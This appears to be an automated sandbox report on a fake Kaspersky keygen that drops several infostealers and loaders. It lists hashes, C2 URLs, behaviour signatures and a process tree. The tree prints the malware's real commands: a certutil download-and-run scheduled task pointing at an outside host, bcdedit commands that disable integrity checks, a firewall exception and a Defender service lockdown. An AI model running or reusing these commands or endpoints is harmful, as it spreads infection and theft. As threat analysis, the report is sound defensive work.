Analysis

  • max time kernel
    300s
  • max time network
    302s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    05-03-2021 14:04

General

  • Target

    Kaspersky.Fraud.Prevention.For.key.code.generator.by.FFF.exe

  • Size

    8.6MB

  • MD5

    d46996fb525c7f4fdfaea7b01c7e6d38

  • SHA1

    064b4deac49cc4d633f1d287a5b6164d0bf9ea02

  • SHA256

    948472e002f81ae18b98a14df1785c22c0b5c0c1f14f2b0caf1f5887493765c9

  • SHA512

    b5ae0719d1e46bba31c80288855ab82e0020cf353d472985f2eee23cc1d95602bf2cb5f1c0bc80c6f6829532e927d7afba4bc684e52e856ed6dcafe92fce2a83

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

51c194bfb6e404af0e5ff0b93b443907a6a845b1

Attributes
  • url4cnc

    https://telete.in/h_focus_1

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • ElysiumStealer Payload 3 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Modifies boot configuration data using bcdedit 15 IoCs
  • Nirsoft 4 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Drops file in Drivers directory 5 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks for any installed AV software in registry 1 TTPs 53 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 18 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 27 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 31 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Script User-Agent 17 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 58 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Kaspersky.Fraud.Prevention.For.key.code.generator.by.FFF.exe
    "C:\Users\Admin\AppData\Local\Temp\Kaspersky.Fraud.Prevention.For.key.code.generator.by.FFF.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3884
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1376
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3748
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:940
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
            • Executes dropped EXE
            PID:3936
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
        keygen-step-1.exe
        3⤵
        • Executes dropped EXE
        PID:4056
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
        keygen-step-3.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3772
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2200
          • C:\Windows\SysWOW64\PING.EXE
            ping 1.1.1.1 -n 1 -w 3000
            5⤵
            • Runs ping.exe
            PID:1676
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
        keygen-step-4.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3484
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2596
          • C:\Users\Admin\AppData\Roaming\B30A.tmp.exe
            "C:\Users\Admin\AppData\Roaming\B30A.tmp.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:3620
            • C:\Users\Admin\AppData\Roaming\B30A.tmp.exe
              "C:\Users\Admin\AppData\Roaming\B30A.tmp.exe"
              6⤵
              • Executes dropped EXE
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:1352
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3824
            • C:\Windows\SysWOW64\PING.EXE
              ping 127.0.0.1
              6⤵
              • Runs ping.exe
              PID:3296
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
          4⤵
          • Executes dropped EXE
          • Writes to the Master Boot Record (MBR)
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Modifies system certificate store
          • Suspicious use of SetWindowsHookEx
          PID:4068
          • C:\Windows\SysWOW64\msiexec.exe
            msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
            5⤵
            • Enumerates connected drives
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:2388
          • C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
            C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Writes to the Master Boot Record (MBR)
            • Suspicious use of SetThreadContext
            • Checks SCSI registry key(s)
            • Suspicious use of SetWindowsHookEx
            PID:3792
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe"
              6⤵
              • Suspicious use of SetWindowsHookEx
              PID:2004
            • C:\Users\Admin\AppData\Roaming\1614952937556.exe
              "C:\Users\Admin\AppData\Roaming\1614952937556.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614952937556.txt"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:508
            • C:\Users\Admin\AppData\Roaming\1614952942337.exe
              "C:\Users\Admin\AppData\Roaming\1614952942337.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614952942337.txt"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:1468
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe"
              6⤵
              • Suspicious use of SetWindowsHookEx
              PID:3820
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe"
              6⤵
              • Suspicious use of SetWindowsHookEx
              PID:3544
            • C:\Users\Admin\AppData\Roaming\1614952948228.exe
              "C:\Users\Admin\AppData\Roaming\1614952948228.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614952948228.txt"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              PID:1124
            • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
              C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              PID:5700
            • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
              "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of SetWindowsHookEx
              PID:5164
          • C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
            C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
            5⤵
            • Executes dropped EXE
            • Writes to the Master Boot Record (MBR)
            • Checks SCSI registry key(s)
            • Suspicious use of SetWindowsHookEx
            PID:920
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c taskkill /f /im chrome.exe
              6⤵
                PID:3896
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im chrome.exe
                  7⤵
                  • Kills process with taskkill
                  PID:648
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
                6⤵
                  PID:504
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 3
                    7⤵
                    • Runs ping.exe
                    PID:2140
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                5⤵
                  PID:1532
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 3
                    6⤵
                    • Runs ping.exe
                    PID:200
              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                4⤵
                • Executes dropped EXE
                PID:2700
                • C:\Users\Admin\AppData\Local\Temp\M85SMEENEY\multitimer.exe
                  "C:\Users\Admin\AppData\Local\Temp\M85SMEENEY\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                  5⤵
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  PID:3492
                  • C:\Users\Admin\AppData\Local\Temp\M85SMEENEY\multitimer.exe
                    "C:\Users\Admin\AppData\Local\Temp\M85SMEENEY\multitimer.exe" 1 3.1614953158.60423ac618dd5 101
                    6⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    PID:3172
                    • C:\Users\Admin\AppData\Local\Temp\M85SMEENEY\multitimer.exe
                      "C:\Users\Admin\AppData\Local\Temp\M85SMEENEY\multitimer.exe" 2 3.1614953158.60423ac618dd5
                      7⤵
                      • Executes dropped EXE
                      • Checks for any installed AV software in registry
                      • Maps connected drives based on registry
                      • Enumerates system info in registry
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3648
                      • C:\Users\Admin\AppData\Local\Temp\jlfuhdw3k5x\safebits.exe
                        "C:\Users\Admin\AppData\Local\Temp\jlfuhdw3k5x\safebits.exe" /S /pubid=1 /subid=451
                        8⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of SetWindowsHookEx
                        PID:4380
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\DragonFruitSoftware\tmorgm.dll",tmorgm C:\Users\Admin\AppData\Local\Temp\jlfuhdw3k5x\safebits.exe
                          9⤵
                          • Blocklisted process makes network request
                          • Loads dropped DLL
                          PID:6552
                      • C:\Users\Admin\AppData\Local\Temp\qegbao440qe\vict.exe
                        "C:\Users\Admin\AppData\Local\Temp\qegbao440qe\vict.exe" /VERYSILENT /id=535
                        8⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        PID:4392
                        • C:\Users\Admin\AppData\Local\Temp\is-8N44D.tmp\vict.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-8N44D.tmp\vict.tmp" /SL5="$60136,870426,780800,C:\Users\Admin\AppData\Local\Temp\qegbao440qe\vict.exe" /VERYSILENT /id=535
                          9⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops file in Program Files directory
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SetWindowsHookEx
                          PID:4688
                      • C:\Users\Admin\AppData\Local\Temp\3rswkwshydd\askinstall24.exe
                        "C:\Users\Admin\AppData\Local\Temp\3rswkwshydd\askinstall24.exe"
                        8⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        PID:4372
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c taskkill /f /im chrome.exe
                          9⤵
                            PID:4672
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /f /im chrome.exe
                              10⤵
                              • Kills process with taskkill
                              PID:5564
                        • C:\Users\Admin\AppData\Local\Temp\q2ileboe3lt\yeyibm3rtid.exe
                          "C:\Users\Admin\AppData\Local\Temp\q2ileboe3lt\yeyibm3rtid.exe" /VERYSILENT
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          PID:4364
                          • C:\Users\Admin\AppData\Local\Temp\is-3OJJK.tmp\yeyibm3rtid.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-3OJJK.tmp\yeyibm3rtid.tmp" /SL5="$700F4,870426,780800,C:\Users\Admin\AppData\Local\Temp\q2ileboe3lt\yeyibm3rtid.exe" /VERYSILENT
                            9⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in Program Files directory
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            PID:4696
                        • C:\Users\Admin\AppData\Local\Temp\p3rgi0idusc\app.exe
                          "C:\Users\Admin\AppData\Local\Temp\p3rgi0idusc\app.exe" /8-23
                          8⤵
                          • Executes dropped EXE
                          PID:4532
                          • C:\Users\Admin\AppData\Local\Temp\p3rgi0idusc\app.exe
                            "C:\Users\Admin\AppData\Local\Temp\p3rgi0idusc\app.exe" /8-23
                            9⤵
                            • Windows security modification
                            • Adds Run key to start application
                            • Drops file in Windows directory
                            • Modifies data under HKEY_USERS
                            PID:6532
                            • C:\Windows\System32\cmd.exe
                              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                              10⤵
                                PID:5392
                                • C:\Windows\system32\netsh.exe
                                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                  11⤵
                                  • Modifies data under HKEY_USERS
                                  PID:6908
                              • C:\Windows\rss\csrss.exe
                                C:\Windows\rss\csrss.exe /8-23
                                10⤵
                                • Drops file in Drivers directory
                                • Drops file in Windows directory
                                • Modifies data under HKEY_USERS
                                PID:6584
                                • C:\Windows\SYSTEM32\schtasks.exe
                                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                  11⤵
                                  • Creates scheduled task(s)
                                  PID:6656
                                • C:\Windows\SYSTEM32\schtasks.exe
                                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                                  11⤵
                                  • Executes dropped EXE
                                  • Checks SCSI registry key(s)
                                  • Creates scheduled task(s)
                                  • Suspicious use of SetWindowsHookEx
                                  PID:5760
                                • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                                  "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                                  11⤵
                                  • Loads dropped DLL
                                  PID:6740
                                  • C:\Windows\system32\bcdedit.exe
                                    C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                                    12⤵
                                    • Modifies boot configuration data using bcdedit
                                    PID:7044
                                  • C:\Windows\system32\bcdedit.exe
                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                                    12⤵
                                    • Modifies boot configuration data using bcdedit
                                    PID:6932
                                  • C:\Windows\system32\bcdedit.exe
                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                                    12⤵
                                    • Modifies boot configuration data using bcdedit
                                    PID:4168
                                  • C:\Windows\system32\bcdedit.exe
                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                                    12⤵
                                    • Modifies boot configuration data using bcdedit
                                    PID:6412
                                  • C:\Windows\system32\bcdedit.exe
                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                                    12⤵
                                    • Modifies boot configuration data using bcdedit
                                    PID:6228
                                  • C:\Windows\system32\bcdedit.exe
                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                                    12⤵
                                    • Modifies boot configuration data using bcdedit
                                    PID:5508
                                  • C:\Windows\system32\bcdedit.exe
                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                                    12⤵
                                    • Modifies boot configuration data using bcdedit
                                    PID:4964
                                  • C:\Windows\system32\bcdedit.exe
                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                                    12⤵
                                    • Modifies boot configuration data using bcdedit
                                    PID:6680
                                  • C:\Windows\system32\bcdedit.exe
                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                                    12⤵
                                    • Modifies boot configuration data using bcdedit
                                    PID:4360
                                  • C:\Windows\system32\bcdedit.exe
                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                                    12⤵
                                    • Modifies boot configuration data using bcdedit
                                    PID:6640
                                  • C:\Windows\system32\bcdedit.exe
                                    C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                                    12⤵
                                    • Modifies boot configuration data using bcdedit
                                    • Drops file in Windows directory
                                    • Modifies Internet Explorer settings
                                    • Modifies registry class
                                    • Suspicious use of SetWindowsHookEx
                                    PID:4652
                                  • C:\Windows\system32\bcdedit.exe
                                    C:\Windows\system32\bcdedit.exe -timeout 0
                                    12⤵
                                    • Modifies boot configuration data using bcdedit
                                    PID:5928
                                  • C:\Windows\system32\bcdedit.exe
                                    C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                                    12⤵
                                    • Modifies boot configuration data using bcdedit
                                    PID:6924
                                  • C:\Windows\system32\bcdedit.exe
                                    C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
                                    12⤵
                                    • Modifies boot configuration data using bcdedit
                                    PID:4928
                                • C:\Windows\System32\bcdedit.exe
                                  C:\Windows\Sysnative\bcdedit.exe /v
                                  11⤵
                                  • Modifies boot configuration data using bcdedit
                                  PID:4476
                                • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                  C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                  11⤵
                                  • Drops file in Drivers directory
                                  PID:5088
                                • C:\Windows\windefender.exe
                                  "C:\Windows\windefender.exe"
                                  11⤵
                                    PID:6188
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                      12⤵
                                        PID:4948
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                          13⤵
                                            PID:4436
                                • C:\Users\Admin\AppData\Local\Temp\30lkdatj3f4\chashepro3.exe
                                  "C:\Users\Admin\AppData\Local\Temp\30lkdatj3f4\chashepro3.exe" /VERYSILENT
                                  8⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4560
                                  • C:\Users\Admin\AppData\Local\Temp\is-6OKP8.tmp\chashepro3.tmp
                                    "C:\Users\Admin\AppData\Local\Temp\is-6OKP8.tmp\chashepro3.tmp" /SL5="$40202,1446038,58368,C:\Users\Admin\AppData\Local\Temp\30lkdatj3f4\chashepro3.exe" /VERYSILENT
                                    9⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SetWindowsHookEx
                                    PID:4784
                                • C:\Users\Admin\AppData\Local\Temp\zl5curi2kjr\agdlxko021x.exe
                                  "C:\Users\Admin\AppData\Local\Temp\zl5curi2kjr\agdlxko021x.exe" /ustwo INSTALL
                                  8⤵
                                  • Executes dropped EXE
                                  PID:4592
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 652
                                    9⤵
                                    • Drops file in Windows directory
                                    • Program crash
                                    PID:4644
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 628
                                    9⤵
                                    • Program crash
                                    PID:5320
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 708
                                    9⤵
                                    • Program crash
                                    PID:5664
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 808
                                    9⤵
                                    • Program crash
                                    PID:5896
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 912
                                    9⤵
                                    • Program crash
                                    PID:4404
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 668
                                    9⤵
                                    • Program crash
                                    PID:4440
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 1156
                                    9⤵
                                    • Program crash
                                    PID:5236
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 1140
                                    9⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    PID:5036
                                • C:\Users\Admin\AppData\Local\Temp\u0f2bmjormd\aixwmsq50o1.exe
                                  "C:\Users\Admin\AppData\Local\Temp\u0f2bmjormd\aixwmsq50o1.exe" testparams
                                  8⤵
                                  • Executes dropped EXE
                                  PID:4544
                                  • C:\Users\Admin\AppData\Roaming\ypy4mxdtkyn\cayq4ousrzw.exe
                                    "C:\Users\Admin\AppData\Roaming\ypy4mxdtkyn\cayq4ousrzw.exe" /VERYSILENT /p=testparams
                                    9⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:5452
                                    • C:\Users\Admin\AppData\Local\Temp\is-9COC3.tmp\cayq4ousrzw.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-9COC3.tmp\cayq4ousrzw.tmp" /SL5="$30246,404973,58368,C:\Users\Admin\AppData\Roaming\ypy4mxdtkyn\cayq4ousrzw.exe" /VERYSILENT /p=testparams
                                      10⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      • Loads dropped DLL
                                      • Adds Run key to start application
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5516
                                • C:\Users\Admin\AppData\Local\Temp\xys2iiqtyo2\bysbfhh1pul.exe
                                  "C:\Users\Admin\AppData\Local\Temp\xys2iiqtyo2\bysbfhh1pul.exe" 57a764d042bf8
                                  8⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  PID:4516
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k "C:\Program Files\TBQU59EC8Y\TBQU59EC8.exe" 57a764d042bf8 & exit
                                    9⤵
                                      PID:5576
                                      • C:\Program Files\TBQU59EC8Y\TBQU59EC8.exe
                                        "C:\Program Files\TBQU59EC8Y\TBQU59EC8.exe" 57a764d042bf8
                                        10⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        • Adds Run key to start application
                                        • Drops file in Program Files directory
                                        PID:6000
                                  • C:\Users\Admin\AppData\Local\Temp\p3pndeoy3ve\vpn.exe
                                    "C:\Users\Admin\AppData\Local\Temp\p3pndeoy3ve\vpn.exe" /silent /subid=482
                                    8⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:4636
                                    • C:\Users\Admin\AppData\Local\Temp\is-45CFG.tmp\vpn.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-45CFG.tmp\vpn.tmp" /SL5="$1025C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\p3pndeoy3ve\vpn.exe" /silent /subid=482
                                      9⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Drops file in Program Files directory
                                      • Modifies system certificate store
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SetWindowsHookEx
                                      PID:4880
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                        10⤵
                                          PID:5920
